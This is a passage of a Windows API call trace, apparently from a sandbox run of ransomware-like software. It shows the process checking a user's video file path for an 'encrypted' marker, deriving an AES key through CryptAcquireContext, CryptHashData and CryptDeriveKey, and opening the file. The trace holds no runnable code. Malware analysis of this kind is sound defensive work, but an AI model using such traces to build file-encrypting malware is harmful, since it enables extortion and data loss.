koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ke8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.329] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.329] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.329] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.329] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.329] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.329] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.330] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.330] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.330] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.330] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cd467f0, ftCreationTime.dwHighDateTime=0x1d5bbff, ftLastAccessTime.dwLowDateTime=0xabbcf130, ftLastAccessTime.dwHighDateTime=0x1d5b818, ftLastWriteTime.dwLowDateTime=0xabbcf130, ftLastWriteTime.dwHighDateTime=0x1d5b818, nFileSizeHigh=0x0, nFileSizeLow=0x1340, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="E- koDk.mkv", cAlternateFileName="E-KODK~1.MKV")) returned 0x7c2240 [0042.330] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.330] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.330] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.330] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.330] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.331] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.331] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.331] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.331] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.331] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.331] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0042.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.331] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0042.332] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.332] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.332] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.332] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.332] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.332] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.332] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.332] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.332] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.332] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.332] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.332] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.332] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.332] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.332] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.333] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.333] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.333] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.333] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.333] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.333] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.333] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.333] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.333] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.333] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.333] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.333] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.333] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.334] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.334] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.334] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.334] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.334] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.334] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.334] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.334] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.334] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.334] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.334] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.334] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.334] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.334] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.334] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0042.335] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.335] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.335] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.335] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.335] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.335] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.335] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0042.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.335] CryptDestroyHash (hHash=0x7c2100) returned 1 [0042.335] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.335] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.335] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.335] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.335] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\e- kodk.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.335] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.336] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 